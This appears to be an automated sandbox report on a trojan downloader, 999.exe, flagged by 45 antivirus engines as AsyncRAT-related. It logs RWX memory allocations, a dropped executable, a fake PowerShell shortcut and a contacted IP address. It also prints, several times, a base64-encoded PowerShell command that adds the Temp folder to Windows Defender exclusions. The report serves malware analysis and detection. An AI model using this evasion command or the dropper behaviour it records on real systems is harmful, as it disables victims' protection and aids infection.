NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\q2cbghl0.u2a.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

powershell -enc JABlAHgAYwBsAHUAZABlAFAAYQB0AGgAIAA9ACAAIgAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABUAGUAbQBwACIADQAKAA0ACgAkAGMAdQByAHIAZQBuAHQARQB4AGMAbAB1AHMAaQBvAG4AcwAgAD0AIABHAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgADQAKAA0ACgBpAGYAIAAoACQAYwB1AHIAcgBlAG4AdABFAHgAYwBsAHUAcwBpAG8AbgBzACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGUAeABjAGwAdQBkAGUAUABhAHQAaAApACAAewANAAoAIAAgACAAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAHgAYwBsAHUAZABlAFAAYQB0AGgADQAKACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAHwRDBEIETAQgACQAZQB4AGMAbAB1AGQAZQBQAGEAdABoACAAQwRBBD8ENQRIBD0EPgQgADQEPgQxBDAEMgQ7BDUEPQQgADIEIAA4BEEEOgQ7BE4ERwQ1BD0EOARPBCAAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAuACIADQAKAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAfBEMEQgRMBCAAJABlAHgAYwBsAHUAZABlAFAAYQB0AGgAIABDBDYENQQgAD0EMARFBD4ENAQ4BEIEQQRPBCAAMgQgADgEQQQ6BDsETgRHBDUEPQQ4BE8ERQQgAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIALgAiAA0ACgB9AA==

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JABlAHgAYwBsAHUAZABlAFAAYQB0AGgAIAA9ACAAIgAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABUAGUAbQBwACIADQAKAA0ACgAkAGMAdQByAHIAZQBuAHQARQB4AGMAbAB1AHMAaQBvAG4AcwAgAD0AIABHAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgADQAKAA0ACgBpAGYAIAAoACQAYwB1AHIAcgBlAG4AdABFAHgAYwBsAHUAcwBpAG8AbgBzACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGUAeABjAGwAdQBkAGUAUABhAHQAaAApACAAewANAAoAIAAgACAAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAHgAYwBsAHUAZABlAFAAYQB0AGgADQAKACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAHwRDBEIETAQgACQAZQB4AGMAbAB1AGQAZQBQAGEAdABoACAAQwRBBD8ENQRIBD0EPgQgADQEPgQxBDAEMgQ7BDUEPQQgADIEIAA4BEEEOgQ7BE4ERwQ1BD0EOARPBCAAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAuACIADQAKAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAfBEMEQgRMBCAAJABlAHgAYwBsAHUAZABlAFAAYQB0AGgAIABDBDYENQQgAD0EMARFBD4ENAQ4BEIEQQRPBCAAMgQgADgEQQQ6BDsETgRHBDUEPQQ4BE8ERQQgAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIALgAiAA0ACgB9AA==

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\q2cbghl0.u2a.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\q2cbghl0.u2a.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Sept. 17, 2024, 1:21 p.m.	show_type: 0 filepath_r: powershell parameters: -enc JABlAHgAYwBsAHUAZABlAFAAYQB0AGgAIAA9ACAAIgAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABUAGUAbQBwACIADQAKAA0ACgAkAGMAdQByAHIAZQBuAHQARQB4AGMAbAB1AHMAaQBvAG4AcwAgAD0AIABHAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgADQAKAA0ACgBpAGYAIAAoACQAYwB1AHIAcgBlAG4AdABFAHgAYwBsAHUAcwBpAG8AbgBzACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGUAeABjAGwAdQBkAGUAUABhAHQAaAApACAAewANAAoAIAAgACAAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAHgAYwBsAHUAZABlAFAAYQB0AGgADQAKACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAHwRDBEIETAQgACQAZQB4AGMAbAB1AGQAZQBQAGEAdABoACAAQwRBBD8ENQRIBD0EPgQgADQEPgQxBDAEMgQ7BDUEPQQgADIEIAA4BEEEOgQ7BE4ERwQ1BD0EOARPBCAAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAuACIADQAKAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAfBEMEQgRMBCAAJABlAHgAYwBsAHUAZABlAFAAYQB0AGgAIABDBDYENQQgAD0EMARFBD4ENAQ4BEIEQQRPBCAAMgQgADgEQQQ6BDsETgRHBDUEPQQ4BE8ERQQgAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIALgAiAA0ACgB9AA== filepath: powershell	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 17, 2024, 1:21 p.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process 999.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
recv Sept. 17, 2024, 1:21 p.m.	buffer: HTTP/1.1 200 OK Date: Tue, 17 Sep 2024 04:29:12 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 13 Sep 2024 13:23:13 GMT ETag: "be00-62200200f26c8" Accept-Ranges: bytes Content-Length: 48640 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL `à¬®Ë à@ @\ËOà÷ H.text´« ¬ `.rsrc÷ à®@@.reloc¼@BËH´]¨m./\( ~~~~~~~~~~~**(B þ2~oC ús³%r«po(g rsp( o o«o¨( è( Ús³%r«porpo«%rpoo«o¨( Vs sh (,(-Ð(a (o ¥rp(g r1p( o (+!~##F(8~"o &o ^(A%(C&(B&^þ;s s "n(F9( è( >(I:B~.(Jo ºrÛps¨ .r)ps¨ /rwps¨ 0V(Ä sÅ oÆ zoÍ >oÍ YoÎ n~29~2oÛ 2VÐ(a ( 7~~( 9(U9(fVr3p~(i :^( o" (n(ä ^( ( (po V(´ rpo" A2~Bo" 2~Bo 2(û (wO%Ò%cÒ%cÒ%cÒNO%Ò%cÒ2(ü (w.sý BV}D( }CJ{C{Doþ {DX}D{D{Coÿ þ"}DV( }F}E2{FoN{Fo%o«N{Fo%oN{Fo%o¤6{Eoþ 2{Eoÿ f}G{Go¿ }H{J; (}J({J; (}J((R}I}JR£}I}JB}I}JR(%}Go V(%}GjoV(}I}J>}I}Jv{I:r¥p{Io< R}J}IV }J¥}IR}J¤}I(¡"( ("(("(¤{J2{Ls~Jsh }L( :o Ò(¶2 Ào j Ëo ({oP ~ Êo ( (woP z9 Ão Âo *0í 8 è( X ~( 2å(:( ~( 9(E(^:( ~( 9 received: 2720 socket: 1224	1	2720	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 17, 2024, 1:21 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

147.45.44.131

File has been identified by 45 AntiVirus engines on VirusTotal as malicious (45 events)

Bkav	W32.AIDetectMalware.CS
Lionic	Trojan.Win32.AsyncRAT.a!c
CAT-QuickHeal	TrojanDownloader.MSIL
Skyhigh	Artemis!Trojan
Cylance	Unsafe
Sangfor	Downloader.Msil.Psdownload.V9es
CrowdStrike	win/malicious_confidence_70% (D)
BitDefender	Gen:Variant.Tedy.643207
Arcabit	Trojan.Tedy.D9D087
Symantec	MSIL.Downloader!gen6
Elastic	malicious (moderate confidence)
ESET-NOD32	a variant of Generik.EEEJOI
Avast	Win32:MalwareX-gen [Trj]
Kaspersky	HEUR:Trojan-Downloader.MSIL.PsDownload.gen
Alibaba	TrojanDownloader:MSIL/PsDownload.1d1e9651
MicroWorld-eScan	Gen:Variant.Tedy.643207
Rising	Malware.Obfus/MSIL@AI.85 (RDM.MSIL2:xRtmAIOF7heohKv9oqW87w)
Emsisoft	Gen:Variant.Tedy.643207 (B)
DrWeb	Trojan.DownLoader47.38394
TrendMicro	Backdoor.Win32.ASYNCRAT.YXEIPZ
McAfeeD	Real Protect-LS!290A51A1F510
CTX	exe.trojan.msil
Sophos	Mal/Generic-S
Ikarus	Trojan-Downloader.Win32.Generic
FireEye	Gen:Variant.Tedy.643207
Webroot	W32.Trojan.Gen
Google	Detected
Antiy-AVL	Trojan[Downloader]/MSIL.PsDownload
Kingsoft	Win32.Troj.Unknown.a
Gridinsoft	Trojan.Win32.AsyncRAT.tr
Microsoft	TrojanDownloader:MSIL/AsyncRat.CCIF!MTB
ZoneAlarm	HEUR:Trojan-Downloader.MSIL.PsDownload.gen
GData	Win32.Trojan-Downloader.Generic.5P40OX
Varist	W32/ABTrojan.EAFH-5477
AhnLab-V3	Malware/Win.Generic.C5670865
McAfee	Artemis!290A51A1F510
DeepInstinct	MALICIOUS
Malwarebytes	Generic.Malware/Suspicious
Panda	Trj/Chgt.AD
TrendMicro-HouseCall	Backdoor.Win32.ASYNCRAT.YXEIPZ
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	PossibleThreat.MU
AVG	Win32:MalwareX-gen [Trj]
Paloalto	generic.ml
alibabacloud	Trojan[downloader]:MSIL/AsyncRat.CWE93DGW

999.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All